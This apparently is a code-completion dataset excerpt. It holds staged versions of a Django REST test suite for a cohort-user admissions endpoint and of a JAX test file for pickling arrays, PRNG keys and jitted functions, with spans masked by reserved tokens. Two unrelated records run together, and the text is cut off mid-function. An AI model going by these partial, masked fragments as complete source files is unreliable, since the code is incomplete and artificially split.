'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_without_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 
'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_with_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n model_dict = self.get_cohort_user_dict(1)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'id': model.cohort_user.id, 'role': model.cohort_user.\n role, 'educational_status': model.cohort_user.\n educational_status, 'finantial_status': model.cohort_user.\n finantial_status}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n 
self.assertEqual(self.count_cohort_user(), 1)\n self.assertEqual(self.get_cohort_user_dict(1), model_dict)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': 9999})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 9999, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n 
True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(self.count_cohort_user(), 0)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_task(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True, task=True,\n task_status='PENDING', task_type='PROJECT')\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'User has tasks with status pending the educational status cannot be GRADUATED'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED', 
'finantial_status': 'LATE'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Cannot be marked as `GRADUATED` if its financial status is `LATE`'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n",
"step-5": "\"\"\"\nTest /cohort/:id/user/:id\n\"\"\"\nimport re\nfrom unittest.mock import patch\nfrom django.urls.base import reverse_lazy\nfrom rest_framework import status\nfrom breathecode.tests.mocks import (\n GOOGLE_CLOUD_PATH,\n apply_google_cloud_client_mock,\n apply_google_cloud_bucket_mock,\n apply_google_cloud_blob_mock,\n)\nfrom ..mixins import AdmissionsTestCase\n\n\nclass CohortIdUserIdTestSuite(AdmissionsTestCase):\n \"\"\"Test /cohort/:id/user/:id\"\"\"\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_without_auth(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={'cohort_id': 1, 'user_id': 1})\n response = self.client.get(url)\n json = response.json()\n\n self.assertEqual(\n json, {\n 'detail': 'Authentication credentials were not provided.',\n 'status_code': status.HTTP_401_UNAUTHORIZED\n })\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={'cohort_id': 1, 'user_id': 1})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid cohort_id'}\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], 
apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': 999\n })\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid user_id'}\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_without_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {}\n response = self.client.put(url, data)\n 
json = response.json()\n expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_with_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n specialty_mode=True,\n profile_academy=True,\n cohort_user=True)\n model_dict = self.get_cohort_user_dict(1)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.put(url, data)\n json = response.json()\n expected = {\n 'id': model.cohort_user.id,\n 'role': model.cohort_user.role,\n 'educational_status': model.cohort_user.educational_status,\n 'finantial_status': model.cohort_user.finantial_status,\n }\n\n self.assertEqual(json, expected)\n 
self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(self.count_cohort_user(), 1)\n self.assertEqual(self.get_cohort_user_dict(1), model_dict)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n specialty_mode=True,\n profile_academy=True,\n cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': 9999\n })\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n specialty_mode=True,\n profile_academy=True,\n cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': 9999,\n 'user_id': model.user.id\n })\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id(self):\n \"\"\"Test /cohort/:id/user/:id 
without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n specialty_mode=True,\n profile_academy=True,\n cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(self.count_cohort_user(), 0)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_task(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n profile_academy=True,\n cohort_user=True,\n task=True,\n task_status='PENDING',\n task_type='PROJECT')\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {\n 'educational_status': 'GRADUATED',\n }\n response = self.client.put(url, data)\n json = response.json()\n expected = {\n 'status_code': 400,\n 'detail': 'User has tasks with status pending the educational status cannot be GRADUATED',\n }\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n profile_academy=True,\n cohort_user=True)\n url = 
reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {\n 'educational_status': 'GRADUATED',\n 'finantial_status': 'LATE',\n }\n response = self.client.put(url, data)\n json = response.json()\n expected = {\n 'status_code': 400,\n 'detail': 'Cannot be marked as `GRADUATED` if its financial status is `LATE`',\n }\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n",
"step-ids": [
9,
13,
14,
15,
16
]
}
|
[
9,
13,
14,
15,
16
] |
<|reserved_special_token_0|>
class PickleTest(jtu.JaxTestCase):
def testPickleOfDeviceArray(self):
x = jnp.arange(10.0)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
def testPickleOfDeviceArrayWeakType(self):
x = jnp.array(4.0)
self.assertEqual(x.aval.weak_type, True)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
@jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
def testPickleOfKeyArray(self, prng_name):
with jax.default_prng_impl(prng_name):
k1 = jax.random.PRNGKey(72)
s = pickle.dumps(k1)
k2 = pickle.loads(s)
self.assertEqual(k1.dtype, k2.dtype)
self.assertArraysEqual(jax.random.key_data(k1), jax.random.
key_data(k2))
@parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(
None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,
'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',
'y')),))
def testPickleOfPartitionSpecs(self, partition_spec):
restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))
self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)
self.assertTupleEqual(partition_spec, restored_partition_spec)
def testPickleX64(self):
with jax.experimental.enable_x64():
x = jnp.array(4.0, dtype='float64')
s = pickle.dumps(x)
with jax.experimental.disable_x64():
y = pickle.loads(s)
self.assertEqual(x.dtype, jnp.float64)
self.assertArraysEqual(x, y, check_dtypes=False)
self.assertEqual(y.dtype, jnp.float32)
self.assertEqual(y.aval.dtype, jnp.float32)
self.assertIsInstance(y, type(x))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CloudpickleTest(jtu.JaxTestCase):
<|reserved_special_token_0|>
@unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')
def testPickleOfPmappedFunctions(self):
@jax.pmap
def f(x, y):
return x * y
@jax.pmap
def g(z):
return f(z, z + 77)
expected = g(jnp.asarray([[32]]))
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(jnp.asarray([[32]]))
self.assertEqual(expected, actual)
class PickleTest(jtu.JaxTestCase):
def testPickleOfDeviceArray(self):
x = jnp.arange(10.0)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
def testPickleOfDeviceArrayWeakType(self):
x = jnp.array(4.0)
self.assertEqual(x.aval.weak_type, True)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
@jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
def testPickleOfKeyArray(self, prng_name):
with jax.default_prng_impl(prng_name):
k1 = jax.random.PRNGKey(72)
s = pickle.dumps(k1)
k2 = pickle.loads(s)
self.assertEqual(k1.dtype, k2.dtype)
self.assertArraysEqual(jax.random.key_data(k1), jax.random.
key_data(k2))
@parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(
None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,
'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',
'y')),))
def testPickleOfPartitionSpecs(self, partition_spec):
restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))
self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)
self.assertTupleEqual(partition_spec, restored_partition_spec)
def testPickleX64(self):
with jax.experimental.enable_x64():
x = jnp.array(4.0, dtype='float64')
s = pickle.dumps(x)
with jax.experimental.disable_x64():
y = pickle.loads(s)
self.assertEqual(x.dtype, jnp.float64)
self.assertArraysEqual(x, y, check_dtypes=False)
self.assertEqual(y.dtype, jnp.float32)
self.assertEqual(y.aval.dtype, jnp.float32)
self.assertIsInstance(y, type(x))
def testPickleTracerError(self):
with self.assertRaises(core.ConcretizationTypeError):
jax.jit(pickle.dumps)(0)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CloudpickleTest(jtu.JaxTestCase):
@unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')
def testPickleOfJittedFunctions(self):
@jax.jit
def f(x, y):
return x * y
@jax.jit
def g(z):
return f(z, z + 77)
expected = g(32)
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(32)
self.assertEqual(expected, actual)
@unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')
def testPickleOfPmappedFunctions(self):
@jax.pmap
def f(x, y):
return x * y
@jax.pmap
def g(z):
return f(z, z + 77)
expected = g(jnp.asarray([[32]]))
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(jnp.asarray([[32]]))
self.assertEqual(expected, actual)
class PickleTest(jtu.JaxTestCase):
def testPickleOfDeviceArray(self):
x = jnp.arange(10.0)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
def testPickleOfDeviceArrayWeakType(self):
x = jnp.array(4.0)
self.assertEqual(x.aval.weak_type, True)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
@jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
def testPickleOfKeyArray(self, prng_name):
with jax.default_prng_impl(prng_name):
k1 = jax.random.PRNGKey(72)
s = pickle.dumps(k1)
k2 = pickle.loads(s)
self.assertEqual(k1.dtype, k2.dtype)
self.assertArraysEqual(jax.random.key_data(k1), jax.random.
key_data(k2))
@parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(
None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,
'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',
'y')),))
def testPickleOfPartitionSpecs(self, partition_spec):
restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))
self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)
self.assertTupleEqual(partition_spec, restored_partition_spec)
def testPickleX64(self):
with jax.experimental.enable_x64():
x = jnp.array(4.0, dtype='float64')
s = pickle.dumps(x)
with jax.experimental.disable_x64():
y = pickle.loads(s)
self.assertEqual(x.dtype, jnp.float64)
self.assertArraysEqual(x, y, check_dtypes=False)
self.assertEqual(y.dtype, jnp.float32)
self.assertEqual(y.aval.dtype, jnp.float32)
self.assertIsInstance(y, type(x))
def testPickleTracerError(self):
with self.assertRaises(core.ConcretizationTypeError):
jax.jit(pickle.dumps)(0)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
import cloudpickle
except ImportError:
cloudpickle = None
<|reserved_special_token_0|>
config.parse_flags_with_absl()
class CloudpickleTest(jtu.JaxTestCase):
@unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')
def testPickleOfJittedFunctions(self):
@jax.jit
def f(x, y):
return x * y
@jax.jit
def g(z):
return f(z, z + 77)
expected = g(32)
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(32)
self.assertEqual(expected, actual)
@unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')
def testPickleOfPmappedFunctions(self):
@jax.pmap
def f(x, y):
return x * y
@jax.pmap
def g(z):
return f(z, z + 77)
expected = g(jnp.asarray([[32]]))
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(jnp.asarray([[32]]))
self.assertEqual(expected, actual)
class PickleTest(jtu.JaxTestCase):
def testPickleOfDeviceArray(self):
x = jnp.arange(10.0)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
def testPickleOfDeviceArrayWeakType(self):
x = jnp.array(4.0)
self.assertEqual(x.aval.weak_type, True)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
@jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
def testPickleOfKeyArray(self, prng_name):
with jax.default_prng_impl(prng_name):
k1 = jax.random.PRNGKey(72)
s = pickle.dumps(k1)
k2 = pickle.loads(s)
self.assertEqual(k1.dtype, k2.dtype)
self.assertArraysEqual(jax.random.key_data(k1), jax.random.
key_data(k2))
@parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(
None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,
'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',
'y')),))
def testPickleOfPartitionSpecs(self, partition_spec):
restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))
self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)
self.assertTupleEqual(partition_spec, restored_partition_spec)
def testPickleX64(self):
with jax.experimental.enable_x64():
x = jnp.array(4.0, dtype='float64')
s = pickle.dumps(x)
with jax.experimental.disable_x64():
y = pickle.loads(s)
self.assertEqual(x.dtype, jnp.float64)
self.assertArraysEqual(x, y, check_dtypes=False)
self.assertEqual(y.dtype, jnp.float32)
self.assertEqual(y.aval.dtype, jnp.float32)
self.assertIsInstance(y, type(x))
def testPickleTracerError(self):
with self.assertRaises(core.ConcretizationTypeError):
jax.jit(pickle.dumps)(0)
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
<|reserved_special_token_1|>
# Copyright 2021 The JAX Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for interoperability between JAX and pickling libraries."""
import pickle
import unittest
from absl.testing import absltest
from absl.testing import parameterized
try:
import cloudpickle
except ImportError:
cloudpickle = None
import jax
from jax import core
from jax import numpy as jnp
from jax.config import config
from jax.interpreters import pxla
from jax._src import test_util as jtu
config.parse_flags_with_absl()
class CloudpickleTest(jtu.JaxTestCase):
@unittest.skipIf(cloudpickle is None, "Requires cloudpickle")
def testPickleOfJittedFunctions(self):
@jax.jit
def f(x, y):
return x * y
@jax.jit
def g(z):
return f(z, z + 77) # noqa: F821
expected = g(32)
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(32)
self.assertEqual(expected, actual)
@unittest.skipIf(cloudpickle is None, "Requires cloudpickle")
def testPickleOfPmappedFunctions(self):
@jax.pmap
def f(x, y):
return x * y
@jax.pmap
def g(z):
return f(z, z + 77) # noqa: F821
expected = g(jnp.asarray([[32]]))
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(jnp.asarray([[32]]))
self.assertEqual(expected, actual)
class PickleTest(jtu.JaxTestCase):
    """Verify that JAX arrays, PRNG keys, and partition specs survive pickle."""

    def testPickleOfDeviceArray(self):
        original = jnp.arange(10.0)
        restored = pickle.loads(pickle.dumps(original))
        self.assertArraysEqual(original, restored)
        self.assertIsInstance(restored, type(original))
        self.assertEqual(original.aval, restored.aval)

    def testPickleOfDeviceArrayWeakType(self):
        original = jnp.array(4.0)
        # A scalar built from a Python float carries a weak type; the
        # round trip must preserve it (checked via aval equality below).
        self.assertEqual(original.aval.weak_type, True)
        restored = pickle.loads(pickle.dumps(original))
        self.assertArraysEqual(original, restored)
        self.assertIsInstance(restored, type(original))
        self.assertEqual(original.aval, restored.aval)

    @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
    def testPickleOfKeyArray(self, prng_name):
        with jax.default_prng_impl(prng_name):
            key_before = jax.random.PRNGKey(72)
